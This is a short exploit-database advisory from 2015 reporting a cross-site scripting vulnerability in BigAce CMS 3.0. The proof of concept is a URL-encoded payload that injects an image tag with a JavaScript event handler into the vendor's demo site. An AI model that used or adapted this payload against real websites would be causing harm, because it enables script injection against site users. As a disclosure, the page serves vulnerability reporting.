Home / exploits

PDF

BigAce CMS 3.0 Cross Site Scripting

Posted on 08 May 2015

# Affected software: bigace cmc
# Type of vulnerability:cross site scripting
# URL:http://demo.bigace.de/
# Discovered by: provensec
# Website: provensec.com

#version: 3.0
# Proof of concept

http://site/xsspayload

demo:http://demo.bigace.de/%22%3E%3Cimg%20src=d%20onclick=confirm%281%29;%3E

 

TOP